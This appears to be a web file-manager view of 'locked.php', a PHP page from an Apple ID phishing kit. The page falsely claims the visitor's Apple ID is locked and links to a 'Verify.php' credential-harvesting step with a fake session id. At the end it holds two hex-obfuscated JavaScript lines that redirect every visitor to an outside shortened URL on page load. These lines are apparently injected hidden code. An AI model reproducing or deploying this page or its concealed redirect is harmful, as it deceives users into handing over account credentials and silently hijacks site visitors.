Edit File: locked.php
<?php require "includes/session_protect.php"; require "includes/functions.php"; require "includes/simplehtmldom.php"; ?> <!DOCTYPE html> <html> <head> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="width=device-width, initial-scale=1, maximum-scale=1" name="viewport"> <link href="css/Fonts.css" rel="prefetch stylesheet" type="text/css"> <link href="css/Login.css" media="screen" rel="stylesheet" type="text/css"> <title></title> </head> <body> <div class="si-body si-container container-fluid" data-theme="lite" id="content"> <div class="widget-container fade-in restrict-max-wh fade-in" data-mode="embed"> <div class="dialog fade-in"> <div class="app-dialog"> <div class="head"> <div class="title" title-align="center"> <h2> This Apple ID has been locked for security reasons.</h2> </div> </div> <div class="body" body-align="center"> <div class="acc-locked" id="acc-locked"> <div class="dialog-body"> <div class="dialog-info"> <div class="thin">You must unlock your account before signing in.</div> <a class="Unclock" target="_top" href="../Verify.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true">Unlock Account</a> </div> </div> </div> </div> </div> </div> </div> </div> </body> </html> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x68\x75\x4e\x5a\x4c\x59\x58\x55\x67\x30\x72\x31";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x64\x65\x76\x2f\x68\x75\x4e\x5a\x4c\x59\x58\x55\x67\x30\x72\x31";</script>
Back to File Manager